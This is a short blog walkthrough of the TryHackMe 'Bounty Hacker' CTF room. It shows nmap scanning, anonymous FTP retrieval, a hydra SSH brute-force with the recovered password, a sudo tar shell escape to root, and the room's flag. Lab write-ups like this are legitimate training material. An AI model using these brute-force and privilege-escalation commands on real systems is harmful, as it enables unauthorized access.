CTF Walk Through - Bounty Hacker

CTF Walk Through | Jamshedpur | [email protected]


2 subscriber(s)

23/10/2024 Shad Hussain Knowledge Views 77 Comments 0 Analytics Video English DMCA Add Favorite Copy Link

CTF Walk Through - Bounty Hacker - THM


Room link : https://tryhackme.com/r/room/cowboyhacker


STEP1
nmap http://10.10.115.224 
FINDING
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

STEP2
# ftp 10.10.115.224
Name (10.10.115.224:root): anonymous
NO PASSWORD
FINDING
dir
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
get locks.txt
get task.txt

STEP3
hydra -t 16 -l lin -P locks.txt -vV ssh://10.10.115.224
the task file have the user id lin
FINDING
[22][ssh] host: 10.10.115.224   login: lin   password: RedDr4gonSynd1cat3

STEP4
ssh [email protected] -p 22 -- with password = RedDr4gonSynd1cat3
sudo -l
FINDING
User lin may run the following commands on bountyhacker:
(root) /bin/tar

STEP5
visite : https://gtfobins.github.io/# -- and search for tar
FINDING
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
whoami
root
cd /root
cat root.txt
THM{80UN7Y_h4cK3r}

	26.10.2024 Shad Hussain Readers 37
CTF Walk Through - Easy Peasy - THM Room Link : https://tryhackme.com/r/room/easypeasyctf STEP1 nmap -p- -Pn -A ..... Read all...

	24.10.2024 Shad Hussain Readers 71
CTF Walk Through - BreakOut - VulnHub Machine Link : https://www.vulnhub.com/entry/empire-breakout,751/ step1 : a ..... Read all...

	14.05.2024 mutebreak Readers 236
Benefits of taking a Certified Ethical Hacking (CEH) course Comprehensive Knowledge: Gain in-depth knowledge of hacking techniques and t ..... Read all...

	14.05.2024 mutebreak Readers 257
A bug bounty hunting course can offer numerous benefits, ra Skill Enhancement: Develop advanced skills in identifying and exploiting vul ..... Read all...

	14.05.2024 mutebreak Readers 418
A Web Application Penetration Testing (WAPT) course can pro Comprehensive Understanding of Web Security: Gain a thorough understanding o ..... Read all...

	18.05.2024 mutebreak Readers 347
Learning Android penetration testing offers a wealth of ben Enhanced Security Awareness: Understanding the unique vulnerabilities of the A ..... Read all...

	20.05.2024 mutebreak Readers 312
Benefits of a Red Teaming Course for Job Prospects Enhanced Skill Set: Gain in-depth knowledge and practical skills in ethical ..... Read all...

	18.05.2024 mutebreak Readers 439
Learning API penetration testing offers extensive benefits, Enrolling in a comprehensive course on API penetration testing offers numerous ..... Read all...

	30.11.2018 shad hussain Readers 1.3K
5 smart tips to succeed in your start-up 4th will surprise In nearly all the public speaking engagements that I attend and almost every on ..... Read all...

WhatsApp no. else use your mail id to get the otp...! Please tick to get otp in your mail id...!

CTF Walk Through | Jamshedpur | [email protected]

2 subscriber(s)

Related articles